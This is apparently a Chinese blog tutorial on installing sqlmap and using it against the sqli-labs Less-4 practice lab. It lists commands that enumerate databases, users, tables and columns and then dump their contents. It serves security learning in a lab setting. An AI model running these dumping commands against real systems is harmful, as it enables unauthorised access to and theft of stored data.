使用SQLmap检测漏洞

使用sqlmap检测漏洞(经典用法)

1.sqlmap的安装

zip版:https://github.com/sqlmapproject/sqlmap/zipball/master

tar.gz版:https://github.com/sqlmapproject/sqlmap/tarball/master
1、解压安装包
2、找到你安装python的目录(对于我来说:C:Python27中)

3、现在,在python文件夹中创建一个新的文件夹,并命名为“SqlMap”

4、然后把你刚才解压的SqlMap中的文件全部复制到C:Python27\sqlmap文件夹里面

2.基础语法

sqlmap.py -u “注入地址” --dbs // 列举数据库

sqlmap.py -u “注入地址” --current–db // 当前数据库

sqlmap.py -u “注入地址” --users // 列数据库用户

sqlmap.py -u “注入地址” --current–user // 当前用户

sqlmap.py -u “注入地址” --tables -D “数据库” // 列举数据库的表名

sqlmap.py -u “注入地址” --columns -T “表名” -D “数据库” // 获取表的列名

sqlmap.py -u “注入地址” --dump -C “列名字” -T “表名字” -D “数据库” //获取数据库下表的列信息

3.检测注入点并获取信息

1.打开sqlmap

cmd命令行中用cd命令跳转到C:\pyhton27\sqlmap
使用SQLmap检测漏洞_第1张图片

2.以sqli-lib/less-4为例进行检测

1.检测注入点

sqlmap.py -u “注入地址”  

多次输入y
使用SQLmap检测漏洞_第2张图片
得到数据库版本等信息

使用SQLmap检测漏洞_第3张图片

2.获取数据库

sqlmap.py -u “注入地址” --dbs

使用SQLmap检测漏洞_第4张图片
得到所有数据库使用SQLmap检测漏洞_第5张图片

3.获取表(以security为例)

sqlmap.py -u “注入地址” -D security --tables 

使用SQLmap检测漏洞_第6张图片
得到security数据中的所有表使用SQLmap检测漏洞_第7张图片

4.获取字段

sqlmap.py -u “注入地址”  -D 数据库 -T 数据表 --columns

在这里插入图片描述

使用SQLmap检测漏洞_第8张图片

5.输出字段内容

sqlmap.py -u “注入地址”  --dump -C “列名字” -T “表名字”  -D “数据库”

使用SQLmap检测漏洞_第9张图片

你可能感兴趣的:(使用SQLmap检测漏洞)